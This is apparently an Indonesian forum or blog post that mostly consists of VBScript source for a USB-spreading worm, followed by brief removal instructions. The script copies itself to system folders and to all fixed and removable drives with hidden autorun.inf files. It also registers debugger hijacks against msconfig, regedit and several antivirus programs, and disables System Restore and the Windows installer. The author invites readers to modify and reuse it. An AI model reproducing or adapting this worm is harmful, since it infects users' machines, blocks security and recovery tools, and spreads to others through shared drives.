Dini = dini & vbcrlf
Loop
Do
'Buat file induk bahasa coolnya prepare the mother
Set i = you.getspecialfolder(0)
Set jatiya = you.getspecialfolder(1)
Set tf = you.getfile(jatiya & "\hck3d.vbs")
Tf.attributes = 32
Set tf = you.createtextfile(jatiya & "\hck3d.vbs",2,true)
Tf.write dini
Tf.close
Set tf = you.getfile(jatiya & "\hck3d.vbs")
Tf.attributes = 39
'Sebar ke removable disc ditambahkan dengan autorun.inf ini saya mah gak tau bahasa inggrisnya
For each loph in you.drives
If (loph.drivetype = 1 or loph.drivetype = 2) and loph.path <> "a:" then
Set tf=you.getfile(loph.path &"\vhck3d.sys.vbs")
Tf.attributes =32
Set tf=you.createtextfile(loph.path &"\vhck3d.vbs",2,true)
Tf.write dini
Tf.close
Set tf=you.getfile(loph.path &"\vhck3d.vbs")
Tf.attributes = 39
Set tf =you.getfile(loph.path &"\autorun.inf")
Tf.attributes = 32
Set tf=you.createtextfile(loph.path &"\autorun.inf",2,true)
Tf.write isi
Tf.close
Set tf = you.getfile(loph.path &"\autorun.inf")
Tf.attributes=39
End if
Next
'Manipulasi registry
Set vhck3d = createobject("wscript.shell")
'Banyak yang dirubah..liat ndiri deh aaah
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\msconfig.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedit.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedt32.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\registryeditor.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\setup.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avscan.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avcenter.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ashavast.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ansav.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremoval.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremover.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\pcmav-cln.exe.exe\debugger",""
Vhck3d.regwrite "hkey_local_machine\software\microsoft\windows\currentversion\winlogon\legalnoticecaption", "my loph dini"
Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\limitsystemrestorecheckpointing", "1", "reg_dword"
Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\disablemsi", "1", "reg_dword"
Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disablesr", "1", "reg_dword"
Vhck3d.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disableconfig", "1", "reg_dword"
If check <> 1 then
Wscript.sleep 200000
End if
Loop while check <> 1
Set sd = createobject("wscript.shell")
Sd.run i & "\explorer.exe /e,/select, " & wscript.scriptfullname
-----------------------end script-----------------------------
Yaaa....itu adalah scriptnya, tapi kalau kalian mau modifikasi juga boleh..bahkan cukup sampai di
Sd.run i & "\explorer.exe /e,/select, " & wscript.scriptfullname
Juga boleh, yg bawahnya gak usah kalian lanjutin bisa..
Cara bunuhnya gampang.
Ikutin aja langkah2 dibawah ini untuk pembasmiannya.kalo virusnya aktif, (kalo belum, diaktifkan laaah) jangan buka my computer seperti biasa.tapi buka melalui explorer, bisa lewat start -> klik kanan di my computer, bisa lewat jendela + e(logo windows yang ada di keyboard). Lalu masuk di setiap drive melalui tree, ini agar virusnya tidak jalan di banyak drive, cuman cukup jalan di satu drive dimana kalian simpan dan mengaktifakn virus tersebut. Soalnya, kalo virusnya sudah aktif, lalu kalian klik 2x tiap2 drive kalian maka virus itu aktif di banyak drive soalnya di setiap drive ada file autorunnya.
Cara pembasmiannya :
1. Pake plugins ansav yang registry fx, ansav bisa kalian dapatkan disini http://ansav.com/. Setelah itu pilih check all, lalu restart explorer
2. Panggil task manager, bisa melalui ctrl+shift bersamaan lalu tekan esc di processes bunuh semua wscript.exe yang ada
3. Hapus semua file vhck3d.vbs serta autorun.inf di setiap drive
4. Hapus file induknya di c:\windows\system32 yang bernama hck3d.vbs
5. Panggil run, bisa melalui jendela + r (logo windows di keboard)masukkan parameternya PCMAV untuk mengembalikan settingan registry yang dirubah.
(thanks to Galang, junior hacker and vixer ^_^. Yang telah mengembangkan virus ini dengan cukup baik...)